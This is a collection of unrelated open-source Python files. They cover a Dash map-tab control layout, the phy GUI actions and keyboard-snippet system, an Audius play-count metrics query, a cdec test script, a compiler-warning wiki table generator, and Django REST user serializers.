Returns a HTML div of user controls found on top of the map tab.
:param port_arr: list, all possible ports
:param port_val: str, current port value
:param vessel_types_arr: list, all possible vessel types
:param vessel_type_val: str, current vessel type value
:param year_arr: list, all possible years
:param year_val: str, current year value
:param month_arr: list, all possible months
:param month_val: str, current month value
:return: HTML div
"""
return html.Div(
className="tab-port-map-controls",
children=[
html.Div(
className="tab-port-map-single-control-container area-a",
children=[
html.Label(
className="control-label", children=[strings.LABEL_PORT]
),
dcc.Dropdown(
id="port-map-dropdown-port",
clearable=False,
options=[{"label": port, "value": port} for port in port_arr],
value=port_val,
),
],
),
html.Div(className="tab-port-map-single-control-separator area-b"),
html.Div(
className="tab-port-map-single-control-container area-c",
children=[
html.Label(
className="control-label", children=[strings.LABEL_VESSEL]
),
dcc.Dropdown(
id="port-map-dropdown-vessel-type",
clearable=False,
options=[
{"label": vessel_type, "value": vessel_type}
for vessel_type in vessel_types_arr
],
value=vessel_type_val,
),
],
),
html.Div(className="tab-port-map-single-control-separator area-d"),
html.Div(
className="tab-port-map-single-control-container date-grid area-e",
children=[
html.Div(
className="tab-port-map-single-control-container-date",
children=[
html.Label(
className="control-label", children=[strings.LABEL_YEAR]
),
dcc.Dropdown(
id="port-map-dropdown-year",
clearable=False,
options=[
{"label": year, "value": year} for year in year_arr
],
value=year_val,
),
],
),
html.Div(
className="tab-port-map-single-control-separator smaller-line"
),
html.Div(
className="tab-port-map-single-control-container-date",
children=[
html.Label(
className="control-label",
children=[strings.LABEL_MONTH],
),
dcc.Dropdown(
id="port-map-dropdown-month",
clearable=False,
options=[
{"label": month, "value": month}
for month in month_arr
],
value=month_val,
),
],
),
],
),
],
)
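# Illustrative usage (an assumption about the surrounding layout code, which lives in other
# modules of this app): the returned Div is typically dropped into the map tab's layout,
# with the dropdown values below being placeholder examples.
#
#   controls = make_tab_port_map_controls(
#       port_arr=["Antwerp", "Rotterdam"], port_val="Antwerp",
#       vessel_types_arr=["Cargo", "Tanker"], vessel_type_val="Cargo",
#       year_arr=[2019, 2020], year_val=2019,
#       month_arr=list(range(1, 13)), month_val=1,
#   )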
|
phy/gui/actions.py | ycanerol/phy | 118 | 8738 | <filename>phy/gui/actions.py
# -*- coding: utf-8 -*-
"""Actions and snippets."""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import inspect
from functools import partial, wraps
import logging
import re
import sys
import traceback
from .qt import QKeySequence, QAction, require_qt, input_dialog, busy_cursor, _get_icon
from phylib.utils import Bunch
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
# Snippet parsing utilities
# -----------------------------------------------------------------------------
def _parse_arg(s):
"""Parse a number or string."""
try:
return int(s)
except ValueError:
pass
try:
return float(s)
except ValueError:
pass
return s
def _parse_list(s):
"""Parse a comma-separated list of values (strings or numbers)."""
# Range: 'x-y'
if '-' in s:
m, M = map(_parse_arg, s.split('-'))
return list(range(m, M + 1))
# List of ids: 'x,y,z'
elif ',' in s:
return list(map(_parse_arg, s.split(',')))
else:
return _parse_arg(s)
def _parse_snippet(s):
"""Parse an entire snippet command."""
return tuple(map(_parse_list, s.split(' ')))
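# Example (illustrative): _parse_snippet('select 10-12 0.5') returns
# ('select', [10, 11, 12], 0.5) -- the command alias, an expanded id range, and a float.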
def _prompt_args(title, docstring, default=None):
"""Display a prompt dialog requesting function arguments.
'default' is a function returning the default value for the proposed input dialog.
"""
# There are args, need to display the dialog.
# Extract Example: `...` in the docstring to put a predefined text
# in the input dialog.
logger.debug("Prompting arguments for %s", title)
r = re.search('Example: `([^`]+)`', docstring)
docstring_ = docstring[:r.start()].strip() if r else docstring
try:
text = str(default()) if default else (r.group(1) if r else None)
except Exception as e: # pragma: no cover
logger.error("Error while handling user input: %s", str(e))
return
s, ok = input_dialog(title, docstring_, text)
if not ok or not s:
return
# Parse user-supplied arguments and call the function.
args = _parse_snippet(s)
return args
# -----------------------------------------------------------------------------
# Show shortcut utility functions
# -----------------------------------------------------------------------------
def _get_shortcut_string(shortcut):
"""Return a string representation of a shortcut."""
if not shortcut:
return ''
if isinstance(shortcut, (tuple, list)):
return ', '.join([_get_shortcut_string(s) for s in shortcut])
if isinstance(shortcut, str):
if hasattr(QKeySequence, shortcut):
shortcut = QKeySequence(getattr(QKeySequence, shortcut))
else:
return shortcut.lower()
assert isinstance(shortcut, QKeySequence)
s = shortcut.toString() or ''
return str(s).lower()
def _get_qkeysequence(shortcut):
"""Return a QKeySequence or list of QKeySequence from a shortcut string."""
if shortcut is None:
return []
if isinstance(shortcut, (tuple, list)):
return [_get_qkeysequence(s) for s in shortcut]
assert isinstance(shortcut, str)
if hasattr(QKeySequence, shortcut):
return QKeySequence(getattr(QKeySequence, shortcut))
sequence = QKeySequence.fromString(shortcut)
assert not sequence.isEmpty()
return sequence
def _show_shortcuts(shortcuts):
"""Display shortcuts."""
out = []
for n in sorted(shortcuts):
shortcut = _get_shortcut_string(shortcuts[n])
if not n.startswith('_') and not shortcut.startswith('-'):
out.append('- {0:<40} {1:s}'.format(n, shortcut))
if out:
print('Keyboard shortcuts')
print('\n'.join(out))
print('')
def _show_snippets(snippets):
"""Display snippets."""
out = []
for n in sorted(snippets):
snippet = snippets[n]
if not n.startswith('_'):
out.append('- {0:<40} :{1:s}'.format(n, snippet))
if out:
print('Snippets')
print('\n'.join(out))
print('')
def show_shortcuts_snippets(actions):
"""Show the shortcuts and snippets of an Actions instance."""
print(actions.name)
print('-' * len(actions.name))
print()
_show_shortcuts(actions.shortcuts)
_show_snippets(actions._default_snippets)
# -----------------------------------------------------------------------------
# Actions
# -----------------------------------------------------------------------------
def _alias(name):
# Get the alias from the character after & if it exists.
alias = name[name.index('&') + 1] if '&' in name else name
alias = alias.replace(' ', '_').lower()
return alias
def _expected_args(f):
if isinstance(f, partial):
argspec = inspect.getfullargspec(f.func)
else:
argspec = inspect.getfullargspec(f)
f_args = argspec.args
if 'self' in f_args:
f_args.remove('self')
# Remove arguments with defaults from the list.
if len(argspec.defaults or ()):
f_args = f_args[:-len(argspec.defaults)]
# Remove arguments supplied in a partial.
if isinstance(f, partial):
f_args = f_args[len(f.args):]
f_args = [arg for arg in f_args if arg not in f.keywords]
return tuple(f_args)
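# Example (illustrative): _expected_args(lambda a, b, c=0: None) returns ('a', 'b');
# arguments with defaults, and any already supplied through functools.partial, are dropped.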
@require_qt
def _create_qaction(gui, **kwargs):
# Create the QAction instance.
name = kwargs.get('name', '')
name = name[0].upper() + name[1:].replace('_', ' ')
action = QAction(name, gui)
# Show an input dialog if there are args.
callback = kwargs.get('callback', None)
title = getattr(callback, '__name__', 'action')
# Number of expected arguments.
n_args = kwargs.get('n_args', None) or len(_expected_args(callback))
@wraps(callback)
def wrapped(is_checked, *args):
if kwargs.get('checkable', None):
args = (is_checked,) + args
if kwargs.get('prompt', None):
args += _prompt_args(
title, docstring, default=kwargs.get('prompt_default', None)) or ()
if not args: # pragma: no cover
logger.debug("User cancelled input prompt, aborting.")
return
if len(args) < n_args:
logger.warning(
"Invalid function arguments: expecting %d but got %d", n_args, len(args))
return
try:
# Set a busy cursor if set_busy is True.
with busy_cursor(kwargs.get('set_busy', None)):
return callback(*args)
except Exception: # pragma: no cover
logger.warning("Error when executing action %s.", name)
logger.debug(''.join(traceback.format_exception(*sys.exc_info())))
action.triggered.connect(wrapped)
sequence = _get_qkeysequence(kwargs.get('shortcut', None))
if not isinstance(sequence, (tuple, list)):
sequence = [sequence]
action.setShortcuts(sequence)
assert kwargs.get('docstring', None)
docstring = re.sub(r'\s+', ' ', kwargs.get('docstring', None))
docstring += ' (alias: {})'.format(kwargs.get('alias', None))
action.setStatusTip(docstring)
action.setWhatsThis(docstring)
action.setCheckable(kwargs.get('checkable', None))
action.setChecked(kwargs.get('checked', None))
if kwargs.get('icon', None):
action.setIcon(_get_icon(kwargs['icon']))
return action
class Actions(object):
"""Group of actions bound to a GUI.
This class attaches to a GUI and implements the following features:
* Add and remove actions
* Keyboard shortcuts for the actions
* Display all shortcuts
Constructor
-----------
gui : GUI instance
name : str
Name of this group of actions.
menu : str
Name of the GUI menu that will contain the actions.
submenu : str
Name of the GUI submenu that will contain the actions.
default_shortcuts : dict
Map action names to keyboard shortcuts (regular strings).
default_snippets : dict
Map action names to snippets (regular strings).
"""
def __init__(
self, gui, name=None, menu=None, submenu=None, view=None,
insert_menu_before=None, default_shortcuts=None, default_snippets=None):
self._actions_dict = {}
self._aliases = {}
self._default_shortcuts = default_shortcuts or {}
self._default_snippets = default_snippets or {}
assert name
self.name = name
self.menu = menu
self.submenu = submenu
self.view = view
self.view_submenu = None
self.insert_menu_before = insert_menu_before
self._view_submenus = {}
self.gui = gui
gui.actions.append(self)
# Create the menu when creating the Actions instance.
if menu:
gui.get_menu(menu, insert_menu_before)
def _get_menu(self, menu=None, submenu=None, view=None, view_submenu=None):
"""Return the QMenu depending on a combination of keyword arguments."""
# Defaults.
menu = menu or self.menu
submenu = submenu or self.submenu
view = view or self.view
view_submenu = view_submenu or self.view_submenu
# If the action is a view action, it should be added to the view's menu in the dock widget.
if view:
if view_submenu and view_submenu not in self._view_submenus:
self._view_submenus[view_submenu] = view.dock._menu.addMenu(view_submenu)
if view_submenu:
return self._view_submenus[view_submenu]
else:
return view.dock._menu
# Create the submenu if there is one.
if submenu:
# Create the submenu.
self.gui.get_submenu(menu, submenu)
# Make sure the action gets added to the submenu.
menu = submenu
if menu:
return self.gui.get_menu(menu)
def add(self, callback=None, name=None, shortcut=None, alias=None, prompt=False, n_args=None,
docstring=None, menu=None, submenu=None, view=None, view_submenu=None, verbose=True,
checkable=False, checked=False, set_busy=False, prompt_default=None,
show_shortcut=True, icon=None, toolbar=False):
"""Add an action with a keyboard shortcut.
Parameters
----------
callback : function
            Takes no argument if checkable is False, or a boolean (checked) if it is True.
name : str
Action name, the callback's name by default.
shortcut : str
The keyboard shortcut for this action.
alias : str
Snippet, the name by default.
prompt : boolean
Whether this action should display a dialog with an input box where the user can
write arguments to the callback function.
n_args : int
If prompt is True, specify the number of expected arguments.
set_busy : boolean
Whether to use a busy cursor while performing the action.
prompt_default : str
The default text in the input text box, if prompt is True.
docstring : str
The action docstring, to be displayed in the status bar when hovering over the action
item in the menu. By default, the function's docstring.
menu : str
The name of the menu where the action should be added. It is automatically created
if it doesn't exist.
submenu : str
The name of the submenu where the action should be added. It is automatically created
if it doesn't exist.
view : QWidget
A view that belongs to the GUI, if the actions are to be added to the view's menu bar.
view_submenu : str
The name of a submenu in the view menu.
checkable : boolean
Whether the action is checkable (toggle on/off).
checked : boolean
Whether the checkable action is initially checked or not.
show_shortcut : boolean
Whether to show the shortcut in the Help action that displays all GUI shortcuts.
icon : str
Hexadecimal code of the font-awesome icon.
toolbar : boolean
Whether to add the action to the toolbar.
"""
param_names = sorted(inspect.signature(Actions.add).parameters)
l = locals()
kwargs = {param_name: l[param_name] for param_name in param_names if param_name != 'self'}
if callback is None:
# Allow to use either add(func) or @add or @add(...).
kwargs.pop('callback', None)
return partial(self.add, **kwargs)
assert callback
# Get the name from the callback function if needed.
name = name or callback.__name__
alias = alias or self._default_snippets.get(name, _alias(name)).split(' ')[0]
name = name.replace('&', '')
shortcut = shortcut or self._default_shortcuts.get(name, None)
# Skip existing action.
if name in self._actions_dict:
return
# Set the status tip from the function's docstring.
docstring = docstring or callback.__doc__ or name
docstring = re.sub(r'[ \t\r\f\v]{2,}', ' ', docstring.strip())
# Create and register the action.
kwargs.update(name=name, alias=alias, shortcut=shortcut, docstring=docstring)
action = _create_qaction(self.gui, **kwargs)
action_obj = Bunch(qaction=action, **kwargs)
if verbose and not name.startswith('_'):
logger.log(5, "Add action `%s` (%s).", name, _get_shortcut_string(action.shortcut()))
self.gui.addAction(action)
# Do not show private actions in the menu.
if not name.startswith('_'):
# Find the menu in which the action should be added.
qmenu = self._get_menu(
menu=menu, submenu=submenu, view=view, view_submenu=view_submenu)
if qmenu:
qmenu.addAction(action)
# Add the action to the toolbar.
if toolbar:
self.gui._toolbar.show()
self.gui._toolbar.addAction(action)
self._actions_dict[name] = action_obj
# Register the alias -> name mapping.
self._aliases[alias] = name
# Set the callback method.
if callback:
setattr(self, name.lower().replace(' ', '_').replace(':', ''), callback)
def separator(self, **kwargs):
"""Add a separator.
Parameters
----------
menu : str
The name of the menu where the separator should be added. It is automatically created
if it doesn't exist.
submenu : str
The name of the submenu where the separator should be added. It is automatically
created if it doesn't exist.
view : QWidget
A view that belongs to the GUI, if the separator is to be added to the view's menu bar.
view_submenu : str
The name of a submenu in the view menu.
"""
self._get_menu(**kwargs).addSeparator()
def disable(self, name=None):
"""Disable all actions, or only one if a name is passed."""
if name is None:
for name in self._actions_dict:
self.disable(name)
return
self._actions_dict[name].qaction.setEnabled(False)
    def enable(self, name=None):
        """Enable all actions, or only one if a name is passed."""
if name is None:
for name in self._actions_dict:
self.enable(name)
return
self._actions_dict[name].qaction.setEnabled(True)
def get(self, name):
"""Get a QAction instance from its name."""
return self._actions_dict[name].qaction if name in self._actions_dict else None
def run(self, name, *args):
"""Run an action as specified by its name."""
assert isinstance(name, str)
# Resolve the alias if it is an alias.
name = self._aliases.get(name, name)
# Get the action.
action = self._actions_dict.get(name, None)
if not action:
raise ValueError("Action `{}` doesn't exist.".format(name))
if not name.startswith('_'):
logger.debug("Execute action `%s`.", name)
try:
return action.callback(*args)
except TypeError as e:
logger.warning("Invalid action arguments: " + str(e))
return
def remove(self, name):
"""Remove an action."""
self.gui.removeAction(self._actions_dict[name].qaction)
del self._actions_dict[name]
delattr(self, name)
def remove_all(self):
"""Remove all actions."""
names = sorted(self._actions_dict.keys())
for name in names:
self.remove(name)
@property
def shortcuts(self):
"""A dictionary mapping action names to keyboard shortcuts."""
out = {}
for name in sorted(self._actions_dict):
action = self._actions_dict[name]
if not action.show_shortcut:
continue
# Discard actions without shortcut and without an alias.
if not action.shortcut and not action.alias:
continue
            # Only show the alias if it differs from the action name.
alias_str = ' (:%s)' % action.alias if action.alias != name else ''
shortcut = action.shortcut or '-'
shortcut = shortcut if isinstance(action.shortcut, str) else ', '.join(shortcut)
out[name] = '%s%s' % (shortcut, alias_str)
return out
def show_shortcuts(self):
"""Display all shortcuts in the console."""
show_shortcuts_snippets(self)
def __contains__(self, name):
"""Whether the Actions group contains a specified action."""
return name in self._actions_dict
def __repr__(self):
return '<Actions {}>'.format(sorted(self._actions_dict))
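# A minimal usage sketch, assuming `gui` is a main-window object provided by
# the surrounding GUI framework (it must expose `actions`, `addAction()` and
# `get_menu()` as used above):
#
#     file_actions = Actions(gui, name='File', menu='&File')
#
#     @file_actions.add(shortcut='ctrl+o', alias='o')
#     def open_file(path):
#         """Open a file given its path."""
#         print("opening", path)
#
#     file_actions.run('open_file', '/path/to/file')  # run by name...
#     file_actions.run('o', '/path/to/file')          # ...or by alias
#     print(file_actions.shortcuts)                   # name -> shortcut string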
# -----------------------------------------------------------------------------
# Snippets
# -----------------------------------------------------------------------------
class Snippets(object):
"""Provide keyboard snippets to quickly execute actions from a GUI.
This class attaches to a GUI and an `Actions` instance. To every command
is associated a snippet with the same name, or with an alias as indicated
in the action. The arguments of the action's callback functions can be
provided in the snippet's command with a simple syntax. For example, the
following command:
```
:my_action string 3-6
```
corresponds to:
```python
my_action('string', (3, 4, 5, 6))
```
The snippet mode is activated with the `:` keyboard shortcut. A snippet
command is activated with `Enter`, and one can leave the snippet mode
with `Escape`.
When the snippet mode is enabled (with `:`), this object adds a hidden Qt action
for every keystroke. These actions are removed when the snippet mode is disabled.
Constructor
-----------
gui : GUI instance
"""
# HACK: Unicode characters do not seem to work on Python 2
cursor = '\u200A\u258C'
# Allowed characters in snippet mode.
# A Qt shortcut will be created for every character.
_snippet_chars = r"abcdefghijklmnopqrstuvwxyz0123456789 ,.;?!_-+~=*/\(){}[]<>&|"
def __init__(self, gui):
self.gui = gui
self._status_message = gui.status_message
self.actions = Actions(gui, name='Snippets', menu='&File')
# Register snippet mode shortcut.
@self.actions.add(shortcut=':')
def enable_snippet_mode():
"""Enable the snippet mode (type action alias in the status
bar)."""
self.mode_on()
self._create_snippet_actions()
self.mode_off()
@property
def command(self):
"""This is used to write a snippet message in the status bar. A cursor is appended at
the end."""
msg = self.gui.status_message
n = len(msg)
n_cur = len(self.cursor)
return msg[:n - n_cur]
@command.setter
def command(self, value):
value += self.cursor
self.gui.unlock_status()
self.gui.status_message = value
self.gui.lock_status()
def _backspace(self):
"""Erase the last character in the snippet command."""
if self.command == ':':
return
logger.log(5, "Snippet keystroke `Backspace`.")
self.command = self.command[:-1]
def _enter(self):
"""Disable the snippet mode and execute the command."""
command = self.command
logger.log(5, "Snippet keystroke `Enter`.")
# NOTE: we need to set back the actions (mode_off) before running
# the command.
self.mode_off()
self.run(command)
def _create_snippet_actions(self):
"""Add mock Qt actions for snippet keystrokes.
Used to enable snippet mode.
"""
# One action per allowed character.
for i, char in enumerate(self._snippet_chars):
def _make_func(char):
def callback():
logger.log(5, "Snippet keystroke `%s`.", char)
self.command += char
return callback
# Lowercase letters.
self.actions.add(
name='_snippet_{}'.format(i),
shortcut=char,
callback=_make_func(char))
# Uppercase letters.
if char in self._snippet_chars[:26]:
self.actions.add(
name='_snippet_{}_upper'.format(i),
shortcut='shift+' + char,
callback=_make_func(char.upper()))
self.actions.add(
name='_snippet_backspace', shortcut='backspace', callback=self._backspace)
self.actions.add(
name='_snippet_activate', shortcut=('enter', 'return'), callback=self._enter)
self.actions.add(
name='_snippet_disable', shortcut='escape', callback=self.mode_off)
def run(self, snippet):
"""Execute a snippet command.
May be overridden.
"""
assert snippet[0] == ':'
snippet = snippet[1:]
snippet_args = _parse_snippet(snippet)
name = snippet_args[0]
logger.debug("Processing snippet `%s`.", snippet)
try:
# Try to run the snippet on all attached Actions instances.
for actions in self.gui.actions:
try:
actions.run(name, *snippet_args[1:])
return
except ValueError:
# This Actions instance doesn't contain the requested
# snippet, trying the next attached Actions instance.
pass
logger.warning("Couldn't find action `%s`.", name)
except Exception as e:
logger.warning("Error when executing snippet: \"%s\".", str(e))
logger.debug(''.join(traceback.format_exception(*sys.exc_info())))
def is_mode_on(self):
"""Whether the snippet mode is enabled."""
return self.command.startswith(':')
def mode_on(self):
"""Enable the snippet mode."""
logger.debug("Snippet mode enabled, press `escape` to leave this mode.")
# Save the current status message.
self._status_message = self.gui.status_message
self.gui.lock_status()
# Silent all actions except the Snippets actions.
for actions in self.gui.actions:
if actions != self.actions:
actions.disable()
self.actions.enable()
self.command = ':'
def mode_off(self):
"""Disable the snippet mode."""
self.gui.unlock_status()
# Reset the GUI status message that was set before the mode was
# activated.
self.gui.status_message = self._status_message
# Re-enable all actions except the Snippets actions.
self.actions.disable()
for actions in self.gui.actions:
if actions != self.actions:
actions.enable()
# The `:` shortcut should always be enabled.
self.actions.enable('enable_snippet_mode')
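# Example flow: with an Actions group defining `my_action(arg1, arg2)` under
# the alias `ma`, pressing `:`, typing `ma string 3-6` and hitting Enter makes
# this class call `Snippets.run(':ma string 3-6')`, which resolves the alias
# and ends up invoking `my_action('string', (3, 4, 5, 6))` -- the range
# parsing is done by `_parse_snippet`, defined elsewhere in the package.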
|
discovery-provider/src/queries/get_plays_metrics.py | atticwip/audius-protocol | 429 | 8761 | <gh_stars>100-1000
import logging
import time
from sqlalchemy import func, desc
from src.models import Play
from src.utils import db_session
logger = logging.getLogger(__name__)
def get_plays_metrics(args):
"""
Returns metrics for play counts
Args:
args: dict The parsed args from the request
args.start_time: date The start of the query
args.limit: number The max number of responses to return
args.bucket_size: string A date_trunc operation to aggregate timestamps by
Returns:
Array of dictionaries with the play counts and timestamp
"""
db = db_session.get_db_read_replica()
with db.scoped_session() as session:
return _get_plays_metrics(session, args)
def _get_plays_metrics(session, args):
metrics_query = (
session.query(
func.date_trunc(args.get("bucket_size"), Play.created_at).label(
"timestamp"
),
func.count(Play.id).label("count"),
)
.filter(Play.created_at > args.get("start_time"))
.group_by(func.date_trunc(args.get("bucket_size"), Play.created_at))
.order_by(desc("timestamp"))
.limit(args.get("limit"))
)
metrics = metrics_query.all()
metrics = [
{"timestamp": int(time.mktime(m[0].timetuple())), "count": m[1]}
for m in metrics
]
return metrics
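# Example call (illustrative values; `bucket_size` must be a unit accepted by
# the database's date_trunc, e.g. "hour", "day" or "week"):
#
#     from datetime import datetime, timedelta
#     get_plays_metrics({
#         "start_time": datetime.utcnow() - timedelta(days=7),
#         "bucket_size": "day",
#         "limit": 7,
#     })
#     # -> [{"timestamp": 1625097600, "count": 42}, ...] (example values)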
|
python/tests/extractor/refmt.py | kho/cdec | 114 | 8765 | #!/usr/bin/env python
import collections, sys
lines = []
f = collections.defaultdict(int)
fe = collections.defaultdict(lambda: collections.defaultdict(int))
for line in sys.stdin:
tok = [x.strip() for x in line.split('|||')]
count = int(tok[4])
f[tok[1]] += count
fe[tok[1]][tok[2]] += count
lines.append(tok)
for tok in lines:
feat = 'IsSingletonF={0}.0 IsSingletonFE={1}.0'.format(
0 if f[tok[1]] > 1 else 1,
0 if fe[tok[1]][tok[2]] > 1 else 1)
print ' ||| '.join((tok[0], tok[1], tok[2], feat, tok[3]))
|
Toolkits/CMake/hunter/packages/sugar/python/sugar/sugar_warnings_wiki_table_generator.py | roscopecoltran/SniperKit-Core | 102 | 8773 | <reponame>roscopecoltran/SniperKit-Core
#!/usr/bin/env python3
# Copyright (c) 2014, <NAME>
# All rights reserved.
"""
* Wiki table for `leathers` C++ project
Expected format:
### Main table
Name | Clang | GCC | MSVC |
-----------------------------|----------|----------|------|
static-ctor-not-thread-safe | *no* | *no* | 4640 |
switch | **same** | **same** | 4062 |
switch-enum | **same** | **same** | 4061 |
### Xcode/Clang table
Clang | Xcode | Objective-C |
-----------------------|--------------------------------|-------------|
bool-conversion | CLANG_WARN_BOOL_CONVERSION | no |
c++11-extensions | CLANG_WARN_CXX0X_EXTENSIONS | no |
strict-selector-match | GCC_WARN_STRICT_SELECTOR_MATCH | yes |
undeclared-selector | GCC_WARN_UNDECLARED_SELECTOR | yes |
"""
def generate(main_warnings_table):
groups = set()
for i in main_warnings_table:
if i.group != "":
groups.add(i.group)
wiki_file = open("wiki-table.txt", "w")
generate_main_table(main_warnings_table, wiki_file)
for group in groups:
generate_group_table(main_warnings_table, wiki_file, group)
generate_xcode_table(main_warnings_table, wiki_file)
def generate_main_table(main_warnings_table, wiki_file):
head_name = "Name"
head_clang = "Clang"
head_gcc = "GCC"
head_msvc = "MSVC"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def name_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.warning_name)
def clang_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.clang.wiki_entry(table_entry.warning_name))
def gcc_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.gcc.wiki_entry(table_entry.warning_name))
def msvc_visitor(table_entry):
if table_entry.group != "":
return 0
return len(table_entry.msvc.wiki_entry(table_entry.warning_name))
max_name = calc_max(head_name, name_visitor)
max_clang = calc_max(head_clang, clang_visitor)
max_gcc = calc_max(head_gcc, gcc_visitor)
max_msvc = calc_max(head_msvc, msvc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("### Main table\n\n")
s = "{}|{}|{}|{}|\n".format(
fill_string(head_name, max_name),
fill_string(head_clang, max_clang),
fill_string(head_gcc, max_gcc),
fill_string(head_msvc, max_msvc),
)
wiki_file.write(s)
s = "{}|{}|{}|{}|\n".format(
'-' * max_name,
'-' * max_clang,
'-' * max_gcc,
'-' * max_msvc,
)
wiki_file.write(s)
for entry in main_warnings_table:
if entry.group != "":
continue
s = "{}|{}|{}|{}|\n".format(
fill_string(entry.warning_name, max_name),
fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang),
fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc),
fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc),
)
wiki_file.write(s)
def generate_group_table(main_warnings_table, wiki_file, group):
head_name = "Name"
head_clang = "Clang"
head_gcc = "GCC"
head_msvc = "MSVC"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def name_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.warning_name)
def clang_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.clang.wiki_entry(table_entry.warning_name))
def gcc_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.gcc.wiki_entry(table_entry.warning_name))
def msvc_visitor(table_entry):
if table_entry.group != group:
return 0
return len(table_entry.msvc.wiki_entry(table_entry.warning_name))
max_name = calc_max(head_name, name_visitor)
max_clang = calc_max(head_clang, clang_visitor)
max_gcc = calc_max(head_gcc, gcc_visitor)
max_msvc = calc_max(head_msvc, msvc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("\n### Table for group: `{}`\n\n".format(group))
s = "{}|{}|{}|{}|\n".format(
fill_string(head_name, max_name),
fill_string(head_clang, max_clang),
fill_string(head_gcc, max_gcc),
fill_string(head_msvc, max_msvc),
)
wiki_file.write(s)
s = "{}|{}|{}|{}|\n".format(
'-' * max_name,
'-' * max_clang,
'-' * max_gcc,
'-' * max_msvc,
)
wiki_file.write(s)
for entry in main_warnings_table:
if entry.group != group:
continue
s = "{}|{}|{}|{}|\n".format(
fill_string(entry.warning_name, max_name),
fill_string(entry.clang.wiki_entry(entry.warning_name), max_clang),
fill_string(entry.gcc.wiki_entry(entry.warning_name), max_gcc),
fill_string(entry.msvc.wiki_entry(entry.warning_name), max_msvc),
)
wiki_file.write(s)
def generate_xcode_table(main_warnings_table, wiki_file):
head_clang = "Clang"
head_xcode = "Xcode"
head_objc = "Objective-C"
def calc_max(head, visitor):
max_len = len(head)
for x in main_warnings_table:
cur_len = visitor(x)
if cur_len > max_len:
max_len = cur_len
return max_len + 2
def clang_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
return len(table_entry.clang.option)
def xcode_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
return len(table_entry.xcode.option)
def objc_visitor(table_entry):
if table_entry.xcode.option == "":
return 0
if table_entry.objc:
return 3 # "yes"
else:
return 2 # "no"
max_clang = calc_max(head_clang, clang_visitor)
max_xcode = calc_max(head_xcode, xcode_visitor)
max_objc = calc_max(head_objc, objc_visitor)
def fill_string(name, max_name):
result = " " + name + " ";
assert(max_name >= len(result))
left = max_name - len(result)
return result + " " * left
wiki_file.write("\n\n### Xcode/Clang table\n\n")
s = "{}|{}|{}|\n".format(
fill_string(head_clang, max_clang),
fill_string(head_xcode, max_xcode),
fill_string(head_objc, max_objc),
)
wiki_file.write(s)
s = "{}|{}|{}|\n".format(
'-' * max_clang,
'-' * max_xcode,
'-' * max_objc,
)
wiki_file.write(s)
done_list = []
for entry in main_warnings_table:
if entry.xcode.option == "":
continue
if entry.clang.option in done_list:
continue
done_list.append(entry.clang.option)
if entry.objc:
objc = "yes"
else:
objc = "no"
s = "{}|{}|{}|\n".format(
fill_string(entry.clang.option, max_clang),
fill_string(entry.xcode.option, max_xcode),
fill_string(objc, max_objc),
)
wiki_file.write(s)
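# Minimal smoke test with mock entries. The real warning entries are built
# elsewhere in the project; the mock classes below only mimic the attributes
# accessed above (warning_name, group, clang/gcc/msvc with a wiki_entry()
# method and an option, xcode.option, objc).
if __name__ == "__main__":
    class _MockTool:
        def __init__(self, option):
            self.option = option
        def wiki_entry(self, warning_name):
            # The real objects format a wiki cell; any string works here.
            return self.option or "*no*"
    class _MockEntry:
        def __init__(self, warning_name, msvc_code):
            self.warning_name = warning_name
            self.group = ""
            self.clang = _MockTool("**same**")
            self.gcc = _MockTool("**same**")
            self.msvc = _MockTool(msvc_code)
            self.xcode = _MockTool("")
            self.objc = False
    generate([_MockEntry("switch", "4062"), _MockEntry("switch-enum", "4061")])
    # -> writes wiki-table.txt in the current directory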
|
open/users/serializers.py | lawrendran/open | 105 | 8782 | import pytz
from rest_auth.serializers import TokenSerializer
from rest_framework.authtoken.models import Token
from rest_framework.exceptions import ValidationError
from rest_framework.fields import (
CharField,
CurrentUserDefault,
HiddenField,
UUIDField,
ChoiceField,
)
from rest_framework.serializers import ModelSerializer, Serializer
from rest_framework.validators import UniqueValidator
from django.contrib.auth.hashers import check_password
from open.users.models import User
class SimpleUserReadSerializer(ModelSerializer):
class Meta:
model = User
fields = (
"name",
"uuid",
)
class UserReadSerializer(ModelSerializer):
class Meta:
model = User
fields = (
"name",
"uuid",
"signed_up_from",
"date_joined",
"username",
"email",
"created",
"modified",
)
class UserTokenSerializer(TokenSerializer):
user = UserReadSerializer()
class Meta:
model = Token
fields = ["key", "user"]
# TODO - this view and serializer is on hold as you figure out registration (later)
class UserCreateSerializer(ModelSerializer):
username = CharField(validators=[UniqueValidator(queryset=User.objects.all())])
# need to make email optional ... prob should think through signup form a little
email = CharField(
validators=[UniqueValidator(queryset=User.objects.all())], required=False
)
password = CharField(write_only=True, min_length=8)
signed_up_from = CharField(
write_only=True, min_length=8, required=False, default="", trim_whitespace=True
)
timezone_string = ChoiceField(
choices=pytz.all_timezones, required=False, default="US/Eastern"
)
class Meta:
model = User
fields = ["username", "email", "password", "signed_up_from", "timezone_string"]
# TODO test - does this work with just username / no email, etc.
def create(self, validated_data):
username = validated_data.pop("username")
password = validated_data.pop("password")
is_betterself_user = False
if validated_data["signed_up_from"] == "betterself":
is_betterself_user = True
validated_data["is_betterself_user"] = is_betterself_user
user = User.objects.create(username=username, **validated_data)
user.set_password(password)
user.save()
return user
